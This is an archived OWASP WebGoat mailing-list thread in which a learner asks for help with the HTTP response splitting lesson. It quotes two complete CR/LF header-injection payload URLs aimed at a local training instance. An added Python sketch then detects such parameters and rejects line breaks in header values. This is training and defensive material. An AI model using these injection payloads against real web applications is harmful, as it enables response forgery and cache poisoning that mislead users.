List: owasp-webgoat
Subject: Re: [Owasp-webgoat] Help With HTTP Splitting
From: "Brian Spindel" <bspindel () runbox ! com>
Date: 2007-09-20 15:44:31
Message-ID: E1IYOCd-0005WK-DR () fenris ! runbox ! com
Michael,
I got stuck in here as well, and never got unstuck. (WebGoat on Fedora 7 with Firefox)
-Brian
----- Start Original Message -----
Sent: Thu, 20 Sep 2007 10:32:11 -0500
From: "Michael Wisniewski" <wiz561@gmail.com>
To: owasp-webgoat@lists.owasp.org
Subject: [Owasp-webgoat] Help With HTTP Splitting
> Hi!
>
> OK, I feel stupid for asking this....but I'm having problems trying to
> exploit the second lesson. lol...
>
> I'm hoping that somebody can help me out to see what I'm doing wrong.
> I've tried WebGoat on my Mac OS with Firefox. I was having problems
> with it, so I then tried the "Damn Vulnerable Linux" disc which has
> webgoat on it. I'm using that with Konqueror, but still having
> problems. Here's what I'm doing.
>
> 1) In the URL of Konqueror, I put in...
>
> http://127.0.0.1:8080/WebGoat/attack?Screen=50&menu=50&fromRedirect=yes&language=?foo%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Put something in here for a test</html>
>
> 2) After that, I use...
>
> http://127.0.0.1:8080/WebGoat/attack?Screen=50&menu=50&fromRedirect=yes&language=?foo%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202007%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Put something else in here for another test</html>
>
> 3) After you hit enter, I'm assuming that the webgoat screen will
> refresh with my "Put something else in here for another test" text,
> and the HTTP Splitting will have a checkbox.
>
> Is this how you would exploit it? Is there something that I'm missing?
>
> Thank you for any help!!!!
> _______________________________________________
> Owasp-webgoat mailing list
> Owasp-webgoat@lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-webgoat
>
----- End Original Message -----
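Added example, not part of either message and not WebGoat's own code: a defender-side sketch in Python that flags query parameters carrying percent-encoded CR/LF, like the `language` parameter in the requests quoted above, and shows a header builder that refuses such values. The redirect that reflects `language` into a `Location` header is an assumption made for illustration, and the sample URL is constructed (same shape as the quoted request, shortened).

```python
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: same shape as the request quoted in the thread, shortened.
SAMPLE_URL = ("http://127.0.0.1:8080/WebGoat/attack?Screen=50&menu=50"
              "&fromRedirect=yes&language=foo%0d%0aContent-Length:%200")

FORBIDDEN = ("\r", "\n", "\x00")  # characters that must never reach a header line


def query_param(url, name):
    """Return the percent-decoded value of one query parameter (or None)."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True)).get(name)


def params_with_line_breaks(url):
    """Detection: names of query parameters whose decoded value has CR, LF or NUL."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [n for n, v in pairs if any(ch in v for ch in FORBIDDEN)]


def naive_redirect(language):
    """Vulnerable pattern (assumed): request data concatenated into a header."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: /WebGoat/attack?language={language}\r\n\r\n")


def hardened_redirect(language):
    """Same response, but refuse any value that could end the header line."""
    if any(ch in language for ch in FORBIDDEN):
        raise ValueError("CR/LF/NUL in header value")
    return naive_redirect(language)


def header_count(raw_response):
    """Number of header lines between the status line and the blank line."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    return len(head.split("\r\n")) - 1


if __name__ == "__main__":
    value = query_param(SAMPLE_URL, "language")
    print(params_with_line_breaks(SAMPLE_URL))   # parameter(s) to flag
    print(header_count(naive_redirect("en")), header_count(naive_redirect(value)))
    try:
        hardened_redirect(value)
    except ValueError as exc:
        print("rejected:", exc)
```

The same `params_with_line_breaks` check can be run over request URLs pulled from access logs to spot splitting attempts after the fact.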